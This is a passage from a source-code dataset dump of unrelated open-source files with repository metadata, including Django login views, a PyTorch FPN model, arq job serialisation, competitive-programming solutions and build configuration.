**format_tag_result_kwargs
)
json_fp.write(formatted_json)
formatted_xml = format_tag_result(
output_format=TagOutputFormats.XML,
**format_tag_result_kwargs
)
Path(filename_prefix + '.xml').write_text(formatted_xml, encoding='utf-8')
if features is not None:
formatted_data = format_tag_result(
output_format=TagOutputFormats.DATA,
**format_tag_result_kwargs
)
Path(filename_prefix + '.data').write_text(formatted_data, encoding='utf-8')
def get_tag_debug_reporter_if_enabled() -> Optional[TagDebugReporter]:
output_directory = os.environ.get(SCIENCEBEAM_DELFT_TAGGING_DEBUG_OUT)
if not output_directory:
return None
return TagDebugReporter(output_directory)
|
[
"[email protected]"
] | |
d4ee6961649aca8865294008a94b35181bbe50bc
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/CodeJamData/14/03/5.py
|
44713545f4a1f6d56fb33b4f7f95aaa4764dea56
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,620 |
py
|
def trans(a):
return map(lambda x: ''.join(list(x)), zip(*a))
def can(r, c, m):
if r > c: r, c = c, r
safe = r * c - m
if r == 1 or safe == 1:
return True
elif r == 2:
return safe % 2 == 0 and safe >= 4
else:
return not safe in [2, 3, 5, 7]
def solve(r, c, m):
if not can(r, c, m):
print 'Impossible'
return
swapped = False
if r > c: r, c, swapped = c, r, True
ans, safe = [['.'] * c for _ in xrange(r)], r * c - m
if r == 1:
for i in xrange(safe, c):
ans[0][i] = '*'
elif r == 2:
for i in xrange(safe // 2, c):
ans[0][i] = ans[1][i] = '*'
elif m <= (r - 2) * (c - 2):
for i in xrange(m):
ans[r - i % (r - 2) - 1][c - i // (r - 2) - 1] = '*'
else:
ans = [['*'] * c for _ in xrange(r)]
if safe <= 6:
for i in xrange(safe // 2):
ans[i][0] = ans[i][1] = '.'
else:
for i in xrange(8):
ans[i % 3][i // 3] = '.'
safe -= 8
if safe % 2 == 1:
ans[2][2] = '.'
safe -= 1
a = min(r - 3, safe // 2)
for i in xrange(a):
ans[3 + i][0] = ans[3 + i][1] = '.'
safe -= 2 * a
for i in xrange(safe // 2):
ans[0][3 + i] = ans[1][3 + i] = '.'
ans[0][0] = 'c'
if swapped: ans = trans(ans)
for row in ans: print ''.join(row)
T = input()
for i in xrange(T):
[r, c, m] = map(int, raw_input().split())
print 'Case #%d:' % (i + 1)
solve(r, c, m)
|
[
"[email protected]"
] | |
b6176db9cf906b94b069180306ba7dc935c84b19
|
4061f9f2a7dc2acde4c4c630fbe10ac8f5913f5d
|
/user/views.py
|
6059ac2806bf2a9c4bcdc72bc67893bae2b34d3b
|
[] |
no_license
|
eibrahimarisoy/tasty_dishes
|
8b9db3129c4d670f71a9e64025b25f51646c9e36
|
ddfa3286bca06e153fbbd1e1a0d914c9f31d008e
|
refs/heads/master
| 2022-12-04T00:45:55.607207 | 2020-04-03T09:42:31 | 2020-04-03T09:42:31 | 252,424,641 | 0 | 0 | null | 2022-11-22T05:27:25 | 2020-04-02T10:29:54 |
JavaScript
|
UTF-8
|
Python
| false | false | 4,511 |
py
|
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout, update_session_auth_hash
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth.models import User
from django.shortcuts import get_object_or_404, redirect, render
from user.forms import RegisterForm, LoginForm, UserUpdateForm
from recipe.models import Recipe
STATUS = "published"
def user_register(request):
context = dict()
form = RegisterForm(request.POST or None)
if form.is_valid():
# get new user information from form
username = form.clean_username()
first_name = form.clean_first_name()
last_name = form.clean_last_name()
email = form.clean_email()
password = form.clean_password()
# create new user and set_password and set active
new_user = User(username=username, last_name=last_name,
first_name=first_name, email=email)
new_user.set_password(password)
new_user.is_active = True
new_user.save()
# login new user
login(request, new_user)
messages.success(request, "You have successfully registered.")
return redirect("index")
context["register_form"] = form
return render(request, "user/register.html", context)
def user_login(request):
context = dict()
form = LoginForm(request.POST or None)
context["form"] = form
if form.is_valid():
email = form.cleaned_data.get("email")
password = form.cleaned_data.get("password")
# if username is not exists throw and error to user
try:
username = User.objects.get(email=email).username
except User.DoesNotExist:
messages.info(request, "Username is wrong.")
return render(request, "user/login.html", context)
# check username and password are correct
user = authenticate(request, username=username, password=password)
if user is None:
messages.info(request, "Username or password is wrong")
return render(request, "user/login.html", context)
else:
messages.success(request, "You have successfully logged in.")
# start new session for user
login(request, user)
return redirect("index")
return render(request, "user/login.html", context)
@login_required()
def user_logout(request):
logout(request)
messages.success(request, "You have successfully logged out.")
return redirect("index")
@login_required()
def user_like_recipe_list(request):
# to send user's favorite recipes to template
context = dict()
user = request.user
recipes = Recipe.objects.filter(likes=user)
context['recipes'] = recipes
return render(request, "user/like_recipe_list.html", context)
@login_required()
def user_recipe_list(request):
# to show the user their own recipes
context = dict()
user = request.user
recipes = Recipe.objects.filter(
owner=user,
status=STATUS,
)
context['recipes'] = recipes
return render(request, "user/recipe_list.html", context)
@login_required()
def user_profile(request):
context = dict()
user = get_object_or_404(User, pk=request.user.pk)
context['user'] = user
return render(request, "user/profile.html", context)
@login_required()
def update_user_profile(request):
context = dict()
form = UserUpdateForm(request.POST or None, instance=request.user)
context['form'] = form
if request.method == "POST":
if form.is_valid():
form.save()
messages.success(request, "Your profile updated successfully.")
return redirect("user_profile")
return render(request, "user/update_profile.html", context)
@login_required()
def change_password(request):
context = dict()
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user)
messages.success(request, 'Your password has been successfully changed!')
return redirect('user_profile')
else:
messages.error(request, 'You have logged in incorrectly!')
else:
form = PasswordChangeForm(request.user)
context['form'] = form
return render(request, 'user/change_password.html', context)
|
[
"[email protected]"
] | |
fa3f5466ad8bcab2dadb823615e08fc9e14db94a
|
c0795000de54a26956efe1a87afba507bb328b81
|
/docs/conf.py
|
ccd96e7307cb1b7e20bed096c7eb0dfae85de6c9
|
[
"MIT"
] |
permissive
|
steinitzu/beets
|
ff6c24d9e072b3d86f889e2b9af66a6ca2374d09
|
1fbbe6154698ce50f1a7e8d32af9a6376e2c7ede
|
refs/heads/master
| 2021-01-16T20:26:07.732280 | 2013-02-28T18:43:02 | 2013-02-28T18:43:02 | 7,949,551 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 972 |
py
|
AUTHOR = u'Adrian Sampson'
# -- General configuration -----------------------------------------------------
extensions = []
#templates_path = ['_templates']
exclude_patterns = ['_build']
source_suffix = '.rst'
master_doc = 'index'
project = u'beets'
copyright = u'2012, Adrian Sampson'
version = '1.1'
release = '1.1b3'
pygments_style = 'sphinx'
# -- Options for HTML output ---------------------------------------------------
html_theme = 'default'
#html_static_path = ['_static']
htmlhelp_basename = 'beetsdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_documents = [
('index', 'beets.tex', u'beets Documentation',
AUTHOR, 'manual'),
]
# -- Options for manual page output --------------------------------------------
man_pages = [
('reference/cli', 'beet', u'music tagger and library organizer',
[AUTHOR], 1),
('reference/config', 'beetsconfig', u'beets configuration file',
[AUTHOR], 5),
]
|
[
"[email protected]"
] | |
2ea747e7a97063f59f0d0d4584ff5c12e534398b
|
90deb98bd63bdc0f08d80954d3edb3a277e63cd1
|
/arq/jobs.py
|
1d4c756caae0842df1a7973d086f698534b73085
|
[
"MIT"
] |
permissive
|
filmor/arq
|
93a97852eb2aa554ce2c6d548fcfa7dac35b74b4
|
f0b4b8b4db2df0c950069f98d5d62c104912e48d
|
refs/heads/master
| 2020-03-13T21:08:36.514480 | 2018-01-10T15:36:23 | 2018-01-10T15:36:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,365 |
py
|
"""
:mod:`jobs`
===========
Defines the ``Job`` class and descendants which deal with encoding and decoding job data.
"""
import base64
import os
from datetime import datetime
import msgpack
from .utils import DEFAULT_CURTAIL, from_unix_ms, timestamp, to_unix_ms_tz, truncate
__all__ = ['JobSerialisationError', 'Job', 'DatetimeJob']
class ArqError(Exception):
pass
class JobSerialisationError(ArqError):
pass
def gen_random():
"""
generate a lowercase alpha-numeric random string of length 24.
Should have more randomness for its size thank uuid
"""
return base64.b32encode(os.urandom(10))[:16].decode().lower()
# "device control one" should be fairly unique as a dict key and only one byte
DEVICE_CONTROL_ONE = '\x11'
class Job:
"""
Main Job class responsible for encoding and decoding jobs as they go
into and come out of redis.
"""
__slots__ = 'id', 'queue', 'queued_at', 'class_name', 'func_name', 'args', 'kwargs', 'raw_queue', 'raw_data'
def __init__(self, raw_data: bytes, *, queue_name: str=None, raw_queue: bytes=None) -> None:
"""
Create a job instance be decoding a job definition eg. from redis.
:param raw_data: data to decode, as created by :meth:`arq.jobs.Job.encode`
:param raw_queue: raw name of the queue the job was taken from
:param queue_name: name of the queue the job was dequeued from
"""
self.raw_data = raw_data
if queue_name is None and raw_queue is None:
raise ArqError('either queue_name or raw_queue are required')
self.queue = queue_name or raw_queue.decode()
self.raw_queue = raw_queue or queue_name.encode()
self.queued_at, self.class_name, self.func_name, self.args, self.kwargs, self.id = self.decode_raw(raw_data)
self.queued_at /= 1000
@classmethod
def encode(cls, *, job_id: str=None, queued_at: int=None, class_name: str, func_name: str,
args: tuple, kwargs: dict) -> bytes:
"""
Create a byte string suitable for pushing into redis which contains all
required information about a job to be performed.
:param job_id: id to use for the job, leave blank to generate a uuid
:param queued_at: time in ms unix time when the job was queue, if None now is used
:param class_name: name (see :attr:`arq.main.Actor.name`) of the actor class where the job is defined
:param func_name: name of the function be called
:param args: arguments to pass to the function
:param kwargs: key word arguments to pass to the function
"""
queued_at = queued_at or int(timestamp() * 1000)
try:
return cls.encode_raw([queued_at, class_name, func_name, args, kwargs, cls.generate_id(job_id)])
except TypeError as e:
raise JobSerialisationError(str(e)) from e
@classmethod
def generate_id(cls, given_id):
return given_id or gen_random()
@classmethod
def msgpack_encoder(cls, obj):
"""
The default msgpack encoder, adds support for encoding sets.
"""
if isinstance(obj, set):
return {DEVICE_CONTROL_ONE: list(obj)}
else:
return obj
@classmethod
def msgpack_object_hook(cls, obj):
if len(obj) == 1 and DEVICE_CONTROL_ONE in obj:
return set(obj[DEVICE_CONTROL_ONE])
return obj
@classmethod
def encode_raw(cls, data) -> bytes:
return msgpack.packb(data, default=cls.msgpack_encoder, use_bin_type=True)
@classmethod
def decode_raw(cls, data: bytes):
return msgpack.unpackb(data, object_hook=cls.msgpack_object_hook, encoding='utf8')
def to_string(self, args_curtail=DEFAULT_CURTAIL):
arguments = ''
if self.args:
arguments = ', '.join(map(str, self.args))
if self.kwargs:
if arguments:
arguments += ', '
arguments += ', '.join(f'{k}={v!r}' for k, v in sorted(self.kwargs.items()))
return '{s.id:.6} {s.class_name}.{s.func_name}({args})'.format(s=self, args=truncate(arguments, args_curtail))
def short_ref(self):
return '{s.id:.6} {s.class_name}.{s.func_name}'.format(s=self)
def __str__(self):
return self.to_string()
def __repr__(self):
return f'<Job {self} on {self.queue}>'
DEVICE_CONTROL_TWO = '\x12'
TIMEZONE = 'O'
class DatetimeJob(Job):
"""
Alternative Job which copes with datetimes. None timezone naïve dates are supported but
the returned datetimes will use a :mod:`datetime.timezone` class to define the timezone
regardless of the timezone class originally used on the datetime object (eg. ``pytz``).
"""
@classmethod
def msgpack_encoder(cls, obj):
if isinstance(obj, datetime):
ts, tz = to_unix_ms_tz(obj)
result = {DEVICE_CONTROL_TWO: ts}
if tz is not None:
result[TIMEZONE] = tz
return result
else:
return super().msgpack_encoder(obj)
@classmethod
def msgpack_object_hook(cls, obj):
if len(obj) <= 2 and DEVICE_CONTROL_TWO in obj:
return from_unix_ms(obj[DEVICE_CONTROL_TWO], utcoffset=obj.get(TIMEZONE))
else:
return super().msgpack_object_hook(obj)
|
[
"[email protected]"
] | |
f7b3033abbffc59bb77ce0801784a595aa9821d1
|
4be5c172c84e04c35677f5a327ab0ba592849676
|
/python/leetcode/unique_paths_ii/unique_paths_ii.py
|
3cdf92f1c359c3b7d2a6b32488d8026d34b9638a
|
[] |
no_license
|
niranjan-nagaraju/Development
|
3a16b547b030182867b7a44ac96a878c14058016
|
d193ae12863971ac48a5ec9c0b35bfdf53b473b5
|
refs/heads/master
| 2023-04-06T20:42:57.882882 | 2023-03-31T18:38:40 | 2023-03-31T18:38:40 | 889,620 | 9 | 2 | null | 2019-05-27T17:00:29 | 2010-09-05T15:58:46 |
Python
|
UTF-8
|
Python
| false | false | 3,955 |
py
|
'''
https://leetcode.com/problems/unique-paths-ii/
63. Unique Paths II
A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
The robot can only move either down or right at any point in time. The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
Now consider if some obstacles are added to the grids. How many unique paths would there be?
An obstacle and empty space is marked as 1 and 0 respectively in the grid.
Note: m and n will be at most 100.
Example 1:
Input:
[
[0,0,0],
[0,1,0],
[0,0,0]
]
Output: 2
Explanation:
There is one obstacle in the middle of the 3x3 grid above.
There are two ways to reach the bottom-right corner:
1. Right -> Right -> Down -> Down
2. Down -> Down -> Right -> Right
'''
'''
Solution Outline:
0. Allowed directions are R, D
1. Consider moving to cell x,y from 0,0
If there were no obstacles, it would be (num_paths_to(x-1,y) + num_paths_to(x,y-1))
with num_paths_to(x,0) == 1, (only direction allowed is down)
and num_paths_to(0,y) == 1 (only direction allowed is right) {for any 0<=x<m,0<=y<n}
2. With obstacles,
if x,0 is an obstacle,
then the column looks like (x=2 in the example)
[[0
[0
[1
[0
[0 0 . . .
num_paths_to(0,0) = 1
num_paths_to(1,0) = 1
num_paths_to(2,0) = 0 (blockade)
num_paths_to(3,0) = 0 (can' get past blockade moving only D)
num_paths_to(4,0) = 0
Similarly, if (0,y) is an obstacle,
then the first row looks like (y=1 in the example)
[[0 1 0 0 0 0]
num_paths_to(0,0) = 1
num_paths_to(0,1) = 0 (blockade)
num_paths_to(0,y) = 0 (for all y > 1) (can't get past blockade moving only R)
For any random(x,y),
if x,y is an obstacle, then num_paths_to(x,y) = 0
otherwise,
num_paths_to(x,y) = sum(num_paths_to(x-1,y), num_paths_to(x,y-1))
Sample run 1:
A= [
[0,0,0],
[0,1,0],
[0,0,0]
]
DP: [
[0,0,0],
[0,0,0],
[0,0,0]
]
Fill DP row 0,
DP: [
[1,1,1],
[0,0,0],
[0,0,0]
]
Fill DP col 0,
DP: [
[1,1,1],
[1,0,0],
[1,0,0]
]
(x,y): (1,1) is a blockade
DP: [
[1,1,1],
[1,0,0],
[1,0,0]
]
(x,y): (1,2) == sum(left, up) == sum(DP[1,1], DP[0,2]) == 1
DP: [
[1,1,1],
[1,0,1],
[1,0,0]
]
(x,y): (2,1) == sum(left,up) == sum(DP[2,0], DP[1,1]) == 1
DP: [
[1,1,1],
[1,0,1],
[1,1,0]
]
(x,y): (2,2) == sum(left,up) == sum(DP[2,1], DP[1,2]) == 2
DP: [
[1,1,1],
[1,0,1],
[1,1,2]
]
'''
class Solution(object):
def uniquePathsWithObstacles(self, obstacleGrid):
"""
:type obstacleGrid: List[List[int]]
:rtype: int
"""
if not obstacleGrid:
return 0
m = len(obstacleGrid)
n = len(obstacleGrid[0])
# End cell is blocked
if obstacleGrid[-1][-1] == 1:
return 0
DP = [[0 for _ in xrange(n)] for _ in xrange(m)]
# first row
for j in xrange(n):
if obstacleGrid[0][j] == 1:
break
DP[0][j] = 1
# first column
for i in xrange(m):
if obstacleGrid[i][0] == 1:
break
DP[i][0] = 1
for i in xrange(1, m):
for j in xrange(1, n):
if obstacleGrid[i][j] == 0:
DP[i][j] = DP[i-1][j] + DP[i][j-1]
# if A[i][j] is an obstacle, DP[i][j] remains 0
return DP[-1][-1]
if __name__ == '__main__':
s = Solution()
assert s.uniquePathsWithObstacles(\
[
[0,0,0],
[0,1,0],
[0,0,0]
]) == 2
assert s.uniquePathsWithObstacles(\
[
[0,0,0],
[0,1,0],
[0,0,1]
]) == 0
assert s.uniquePathsWithObstacles(\
[
[0,0,1,0],
[0,1,0,0],
[0,0,0,0],
[1,0,0,0]
]) == 3
assert s.uniquePathsWithObstacles(\
[
[0,0,1,0],
[0,1,0,0],
[0,0,0,0],
[0,0,0,0],
[1,0,0,0]
]) == 9
|
[
"[email protected]"
] | |
9c916129fe72fbdc76aaf2997d9bbdfa460fd235
|
de54e5ddf4d350176d70c2bb1501b878285a18b8
|
/fpn.py
|
04a74603728490c73565dff2f7b4854aee3e9411
|
[] |
no_license
|
lizhe960118/find-star
|
e1d73b78b29087ca2e83990354b96b7406eaedf4
|
e233dca4fe9a5faf6df9b6a4e0b2f29a7eb096b0
|
refs/heads/master
| 2020-05-18T10:55:52.008399 | 2019-05-01T03:49:32 | 2019-05-01T03:49:32 | 184,363,943 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,390 |
py
|
'''RetinaFPN in PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.downsample = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.downsample = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.downsample(x)
out = F.relu(out)
return out
# 基础残差块
class ResNetBasicBlock(nn.Module):
expansion = 1
def __init__(self, in_channel, out_channel, stride=1, downsample=None):
super(ResNetBasicBlock, self).__init__()
self.layer1 = nn.Sequential(
nn.Conv2d(in_channel, out_channel, kernel_size=3, stride=stride, padding=1),
nn.BatchNorm2d(out_channel))
self.relu = nn.ReLU(inplace=True)
self.layer2 = nn.Sequential(
nn.Conv2d(out_channel, out_channel, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(out_channel))
self.downsample = downsample
self.stride = stride
def forward(self,x):
residual = x
out = self.layer1(x)
out = self.relu(out)
out = self.layer2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class FPN(nn.Module):
def __init__(self, block, num_blocks):
super(FPN, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False) # 3*3 s1
self.bn1 = nn.BatchNorm2d(64)
self.conv2 = nn.Conv2d(64, 64, kernel_size=1, stride=1, bias=False) # 1*1 s1
self.bn2 = nn.BatchNorm2d(64)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=2, padding=1, bias=False) # 3*3 s2
self.bn3 = nn.BatchNorm2d(64)
# Bottom-up layers
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.conv5 = nn.Conv2d(1024, 256, kernel_size=3, stride=2, padding=1)
# self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
# self.conv6 = nn.Conv2d(2048, 256, kernel_size=3, stride=2, padding=1)
# self.conv7 = nn.Conv2d( 256, 256, kernel_size=3, stride=2, padding=1)
# Lateral layers
# self.latlayer1 = nn.Conv2d(2048, 256, kernel_size=1, stride=1, padding=0)
# self.latlayer2 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)
# self.latlayer3 = nn.Conv2d( 512, 256, kernel_size=1, stride=1, padding=0)
self.latlayer1 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)
self.latlayer2 = nn.Conv2d(512, 256, kernel_size=1, stride=1, padding=0)
self.latlayer3 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
# Top-down layers
self.toplayer1 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
self.toplayer2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def _upsample_add(self, x, y):
'''Upsample and add two feature maps.
Args:
x: (Variable) top feature map to be upsampled.
y: (Variable) lateral feature map.
Returns:
(Variable) added feature map.
Note in PyTorch, when input size is odd, the upsampled feature map
with `F.upsample(..., scale_factor=2, mode='nearest')`
maybe not equal to the lateral feature map size.
e.g.
original input size: [N,_,15,15] ->
conv2d feature map size: [N,_,8,8] ->
upsampled feature map size: [N,_,16,16]
So we choose bilinear upsample which supports arbitrary output sizes.
'''
_,_,H,W = y.size()
return F.upsample(x, size=(H,W), mode='bilinear') + y
def forward(self, x):
# Bottom-up
c1 = F.relu(self.bn1(self.conv1(x)))
c1 = F.relu(self.bn2(self.conv2(c1)))
c1 = F.relu(self.bn3(self.conv3(c1)))
# c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)
c2 = self.layer1(c1) # 300 * 300
c3 = self.layer2(c2)
c4 = self.layer3(c3)
p5 = self.conv5(c4)
# c5 = self.layer4(c4)
# p6 = self.conv6(c5)
# p7 = self.conv7(F.relu(p6))
# Top-down
p4 = self.latlayer1(c4)
p3 = self._upsample_add(p4, self.latlayer2(c3))
p3 = self.toplayer1(p3)
p2 = self._upsample_add(p3, self.latlayer3(c2))
p2 = self.toplayer2(p2)
# p5 = self.latlayer1(c5)
# p4 = self._upsample_add(p5, self.latlayer2(c4))
# p4 = self.toplayer1(p4)
# p3 = self._upsample_add(p4, self.latlayer3(c3))
# p3 = self.toplayer2(p3)
return p2, p3, p4, p5
def FPN50():
# return FPN(Bottleneck, [3,4,6,3])
return FPN(Bottleneck, [3, 4, 6])
def FPN101():
return FPN(Bottleneck, [2,4,23,3])
def test():
net = FPN50()
# fms = net(Variable(torch.randn(1,3,600,300)))
fms = net(Variable(torch.randn(1, 3, 832, 832)))
for fm in fms:
print(fm.size())
# test()
|
[
"[email protected]"
] | |
95ad4fd20d715d2b592087416dd9db29358e23b9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02407/s580407099.py
|
11041f9012ef0a39f8fbc696d88e6c36fe254b03
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
n = int(input())
a = list(map(int,input().split()))
a.reverse()
for i,elem in enumerate(a):
if i != 0:
print (" ", end='')
print (elem, end='')
print ('')
|
[
"[email protected]"
] | |
37416ae207a95ca269005d08f020dd3f0e703430
|
14de7abd1267122ad128c130f45ff86a087ed5cd
|
/nlp/match_blocks.py
|
7e4efbe57c5b3b8a5ce86ca674e74a43cecd808f
|
[
"MIT"
] |
permissive
|
saurabhXcode/tf-attentive-conv
|
64124c470acdb26125680d903cc97ae1cc68a4b9
|
8dcc403575392c8e5c6c287432272a781410c49c
|
refs/heads/master
| 2020-04-12T12:21:35.091291 | 2018-08-11T00:26:44 | 2018-08-11T00:26:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,308 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <[email protected]> <https://hanxiao.github.io>
import tensorflow as tf
from nlp.encode_blocks import CNN_encode
from nlp.nn import linear_logit, dropout_res_layernorm
def AttentiveCNN_match(context, query, context_mask, query_mask,
scope='AttentiveCNN_Block', reuse=None, **kwargs):
with tf.variable_scope(scope, reuse=reuse):
cnn_wo_att = CNN_encode(context, filter_size=3, direction='none', act_fn=None)
att_context, _ = Attentive_match(context, query, context_mask, query_mask)
cnn_att = CNN_encode(att_context, filter_size=1, direction='none', act_fn=None)
output = tf.nn.tanh(cnn_wo_att + cnn_att)
return dropout_res_layernorm(context, output, **kwargs)
def Attentive_match(context, query, context_mask, query_mask,
score_func='dot', causality=False,
scope='attention_match_block', reuse=None, **kwargs):
with tf.variable_scope(scope, reuse=reuse):
batch_size, context_length, num_units = context.get_shape().as_list()
_, query_length, _ = query.get_shape().as_list()
if score_func == 'dot':
score = tf.matmul(context, query, transpose_b=True)
elif score_func == 'bilinear':
score = tf.matmul(linear_logit(context, num_units, scope='context_x_We'), query, transpose_b=True)
elif score_func == 'scaled':
score = tf.matmul(linear_logit(context, num_units, scope='context_x_We'), query, transpose_b=True) / \
(num_units ** 0.5)
elif score_func == 'additive':
score = tf.squeeze(linear_logit(
tf.tanh(tf.tile(tf.expand_dims(linear_logit(context, num_units, scope='context_x_We'), axis=2),
[1, 1, query_length, 1]) +
tf.tile(tf.expand_dims(linear_logit(query, num_units, scope='query_x_We'), axis=1),
[1, context_length, 1, 1])), 1, scope='x_ve'), axis=3)
else:
raise NotImplementedError
mask = tf.matmul(tf.expand_dims(context_mask, -1), tf.expand_dims(query_mask, -1), transpose_b=True)
paddings = tf.ones_like(mask) * (-2 ** 32 + 1)
masked_score = tf.where(tf.equal(mask, 0), paddings, score) # B, Lc, Lq
# Causality = Future blinding
if causality:
diag_vals = tf.ones_like(masked_score[0, :, :]) # (Lc, Lq)
tril = tf.contrib.linalg.LinearOperatorLowerTriangular(diag_vals).to_dense() # (Lc, Lq)
masks = tf.tile(tf.expand_dims(tril, 0), [tf.shape(masked_score)[0], 1, 1]) # B, Lc, Lq
paddings = tf.ones_like(masks) * (-2 ** 32 + 1)
masked_score = tf.where(tf.equal(masks, 0), paddings, masked_score) # B, Lc, Lq
query2context_score = tf.nn.softmax(masked_score, axis=2) * mask # B, Lc, Lq
query2context_attention = tf.matmul(query2context_score, query) # B, Lc, D
context2query_score = tf.nn.softmax(masked_score, axis=1) * mask # B, Lc, Lq
context2query_attention = tf.matmul(context2query_score, context, transpose_a=True) # B, Lq, D
return (query2context_attention, # B, Lc, D
context2query_attention) # B, Lq, D
|
[
"[email protected]"
] | |
827370360a0c207ac6273117c06be4bf6b0b163e
|
882be627c49870ae6f2f81963a3cfc9b719c0011
|
/wscript
|
601c17dd013a3c54bc088dbbc86fb37531affd98
|
[] |
no_license
|
brettviren/cogs
|
794142a04c87ce148e939f8ded852dfa1f6df9bc
|
681d1ed7e12cd2e7469a5ba3fd7261dc4f8f4c26
|
refs/heads/master
| 2022-11-30T12:26:19.624956 | 2020-08-10T12:34:44 | 2020-08-10T12:34:44 | 273,746,410 | 0 | 1 | null | 2020-08-10T12:34:45 | 2020-06-20T16:40:57 |
JavaScript
|
UTF-8
|
Python
| false | false | 2,954 |
#!/usr/bin/env waf
VERSION='0.0.0'
APPNAME='cogs'
import os.path as osp
def options(opt):
opt.load('compiler_cxx')
opt.load('waf_unit_test')
opt.add_option('--quell-tests', action='store_true', default=False,
help='Compile but do not run the tests (default=%default)')
opt.add_option('--with-ers', default=None,
help='Set to ERS install area')
opt.add_option('--with-nljs', default=None,
help='Point nlohmann json install area')
opt.add_option('--with-boost', default=None,
help='Set to BOOST install area (needed by ERS)')
def configure(cfg):
cfg.load('compiler_cxx')
cfg.load('waf_unit_test')
cfg.env.CXXFLAGS += ['-std=c++17', '-ggdb3', '-Wall', '-Werror']
## nlohmann::json
nljs = getattr(cfg.options, 'with_nljs', None)
if nljs:
print("using " + nljs)
setattr(cfg.env, 'INCLUDES_NLJS', [osp.join(nljs, "include")])
cfg.check(features='cxx cxxprogram', define_name='HAVE_NLJS',
header_name='nlohmann/json.hpp',
use='NLJS', uselib_store='NLJS', mandatory=True)
## ERS
ers = getattr(cfg.options, 'with_ers',None)
if ers:
setattr(cfg.env, 'RPATH_ERS', [osp.join(ers, 'lib')]);
setattr(cfg.env, 'LIBPATH_ERS', [osp.join(ers, 'lib')]);
setattr(cfg.env, 'INCLUDES_ERS', [osp.join(ers, 'include')]);
cfg.check(features='cxx cxxprogram', define_name='HAVE_ERS',
header='ers/ers.h', lib=['ers','ErsBaseStreams'],
use='ERS', uselib_store='ERS', mandatory=True)
## Boost is not needed directly by cogs but ERS needs it.
boost = getattr(cfg.options, 'with_boost', None)
if boost:
setattr(cfg.env, 'RPATH_BOOST', [osp.join(boost, 'lib')]);
setattr(cfg.env, 'LIBPATH_BOOST', [osp.join(boost, 'lib')]);
setattr(cfg.env, 'INCLUDES_BOOST', [osp.join(boost, 'include')]);
cfg.check(features='cxx cxxprogram', define_name='HAVE_BOOST',
header=['boost/filesystem/filesystem.hpp',
'boost/preprocessor/preprocessor.hpp'],
lib=['boost_filesystem'],
use='BOOST', uselib_store='BOOST', mandatory=True)
cfg.write_config_header('config.hpp')
def build(bld):
bld.recurse("test")
use=['ERS','BOOST','NLJS']
sources = bld.path.ant_glob('src/*.cpp');
bld.shlib(features='cxx', includes='inc',
source = sources, target='cogs',
uselib_store='COGS', use=use)
bld.install_files('${PREFIX}/include/cogs',
bld.path.ant_glob("inc/cogs/**/*.hpp"),
